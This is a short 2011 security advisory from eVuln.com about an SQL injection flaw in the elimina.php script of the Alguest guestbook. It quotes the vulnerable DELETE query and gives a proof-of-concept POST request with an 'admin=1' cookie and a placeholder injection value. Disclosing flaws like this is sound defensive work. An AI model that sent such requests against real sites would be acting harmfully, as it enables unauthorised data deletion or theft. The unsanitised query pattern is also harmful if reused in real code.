elimina SQL Injection vulnerability in Alguest
Summary
- Vulnerability
- elimina SQL Injection vulnerability in Alguest
- Discovered
- 2011.01.04
- Last Update
- n/a n/a
- ID
- EV0173
- CVE
- n/a
- Risk Level
- medium
- Type
- SQL Injection
- Status
- Unpatched. Vendor notified. No reply from developer(s).
- Vendor
- n/a
- Vulnerable Software
- Alguest (http://sourceforge.net/projects/alguest/)
- Version
- 1.1c-patched
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL Injection found in Alguest (http://sourceforge.net/projects/alguest/) script.
- SQL Injection
- It is possible to inject arbitrary SQL query using elimina parameter in elimina.php script.
Parameter elimina is used in SQL query without any sanitation.
PoC/Exploit
SQL Injection Example
Vulnerable code: $query = "DELETE FROM guest WHERE id=$elimina";
SQL Injection PoC:
POST /alguest/elimina.php HTTP/1.0
Host: website
Cookie: admin=1
Content-Length: N
send=elimina&elimina=[SQL Injection]
Solution.
Solution for "elimina SQL Injection vulnerability in Alguest" is not available. Check vendor's website for updates.